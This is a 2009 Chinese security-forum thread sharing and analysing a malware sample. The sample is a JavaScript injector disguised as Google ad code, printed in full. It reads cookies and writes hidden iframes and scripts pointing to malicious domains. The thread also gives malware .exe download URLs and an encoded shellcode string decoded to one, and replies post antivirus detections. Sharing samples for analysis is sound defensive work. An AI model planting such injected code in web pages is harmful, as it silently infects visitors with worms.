收藏本站 |切换到宽版 | 更换论坛皮肤

找回密码忘记邮箱 QQ快速登录快速登录快速注册

卡饭»论坛 › 安全区 › 病毒样本分享&分析区 › 伪装广告的代码升级

发新帖

查看: 2508|回复: 5

收起左侧

[病毒样本] 伪装广告的代码升级

dayang1717

发表于 2009-5-7 17:21:49 | 显示全部楼层 |阅读模式

<script language="javascript" src="http://officeon.ch.ma/office.js?google_ad_format=728x90_as"></script>

var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var sc=document.getElementsByTagName('script');
var paramsArr=sc[sc.length-1].src.split('//')[1].split('?');
var kesor = cookA.indexOf(cookName);
var Thenm = Then.getSeconds();
if (kesor == -1)
{
document.write('<iframe src=http://wr.jft57.cn/1/06/index.htm?e1-p width=100 height=0></Iframe>');
document.write('<iframe src=about:blank width=50 height=0 id=adfrmae border=0></iframe>');
setTimeout(ggto,5000);
//document.write('<iframe src=http://ddv.sarl.tk/cnzz1.html width=0 height=0></Iframe>');
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://count41.51yes.com/sa.aspx?id=419175949&refe='+window.parent.location+'&location=http%3A//'+paramsArr[0]+'&color=32x&resolution=1280x1024&returning=0&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0></IFRAME>');
document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
}
function ggto(){
adfrmae.location.href='http://wr.jft57.cn/1/06/index.htm?e1-p';

<br>
<br>
<br>
<iframe src=index2.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/1051087/ystat.js"></script>

<script language="JavaScript" charset="gb2312" src="http://count7.51much.com/cnt.php?uid=UA-1-12125&style=text&text=网站统计"></script>

<iframe src=ccqm.htm width=100 height=0></iframe>
<script src="js.css"></script>

http://a1.igr5s.com/1/AvticnX.exe
又是这个东西！

%u7468%u7074%u2F3A%u612F%u2E31%u6769%u3572%u2E73%u6F63%u2F6D%u2F31%u6E41%u2E58%u7865%u0065%u0000
解密为http://a1.igr5s.com/1/AnX.exe

本帖子中包含更多资源

您需要登录才可以下载或查看，没有帐号？快速注册

x

回复

328397663

发表于 2009-5-7 17:25:35 | 显示全部楼层

原帖由 dayang1717 于 2009-5-7 17:21 发表

var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var sc=document.getElementsByTagName('script');
...

Scanned file: AnX.rar - Infected

AnX.rar/AnX.exe - infected by Worm.Win32.AutoRun.afvk
AnX.rar/AvticnX.exe - infected by Worm.Win32.AutoRun.agms

Statistics:

Known viruses:	2141994	Updated:	07-05-2009
File size (Kb):	72	Virus bodies:	2
Files:	2	Warnings:	0
Archives:	1	Suspicious:	0

本帖子中包含更多资源

您需要登录才可以下载或查看，没有帐号？快速注册

x

回复

kingsheet

发表于 2009-5-7 17:34:47 | 显示全部楼层

卡巴检测到：病毒 Worm.Win32.AutoRun.afvk URL: http://bbs.kafan.cn/attachment.p ... 1241688782//AnX.exe

回复

悠柚

发表于 2009-5-7 17:55:30 | 显示全部楼层

AVG Win32/Heur

回复

wrq

发表于 2009-5-7 19:53:10 | 显示全部楼层

Warning

--------------------------------------------------------------------------------

In order not to compromise your security, this page will not be accessed

A virus or unwanted program has been detected
in the HTTP data on the requested page.

--------------------------------------------------------------------------------

Requested URL: http://bbs.kafan.cn/attachment.p ... 75&t=1241697147
Information Is the TR/Killav.PN Trojan

--------------------------------------------------------------------------------

Generated by AntiVir WebGuard 9.0.3.0, AVE 8.2.0.160, VDF 7.1.3.167

回复

BING126

头像被屏蔽

发表于 2009-5-7 21:14:24 | 显示全部楼层

to McAfee

回复

发新帖

高级模式

B Color Image Link Quote Code Smilies

您需要登录后才可以回帖登录 | 快速注册

本版积分规则回帖后跳转到最后一页

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-9-18 20:35 , Processed in 0.124534 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究，不得将上述内容用于商业或者其他非法用途，否则产生的一切后果自负，本站信息来自网络，版权争议问题与本站无关，您必须在下载后的24小时之内从您的电脑中彻底删除上述信息，如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表